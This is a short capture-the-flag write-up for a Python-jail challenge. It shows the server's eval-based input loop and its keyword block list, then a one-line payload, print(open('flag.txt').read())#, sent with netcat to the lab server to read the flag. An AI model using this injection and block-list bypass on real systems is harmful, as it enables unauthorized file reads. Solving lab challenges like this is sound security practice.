Tags: misc
Rating:
# Unbreakble
Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won't be easy. I'm ready for whatever tricks you have up your sleeve!
## Writeup
We can send some python code and it will be exeuted:
```python
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
' ', '-', '!', '[', ']', '*', 'import',
'eval', 'banner', 'echo', 'cat', '%',
'&', '>', '<', '+', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '0', 'b', 's',
'lower', 'upper', 'system', '}', '{' ]
while True:
ans = input('Break me, shake me!\n\n$ ').strip()
if any(char in ans for char in blacklist):
print(f'\n{banner1}\nNaughty naughty..\n')
else:
try:
eval(ans + '()')
print('WHAT WAS THAT?!\n')
except:
print(f"\n{banner2}\nI'm UNBREAKABLE!\n")
```
Just find some command that are not blacklisted:
```python
print(open('flag.txt').read())#
```
Run it on the server:
```bash
echo "print(open('flag.txt').read())#" | nc 94.237.57.155 44218
```
This is the flag:
```
HTB{3v4l_0r_3vuln??}
```
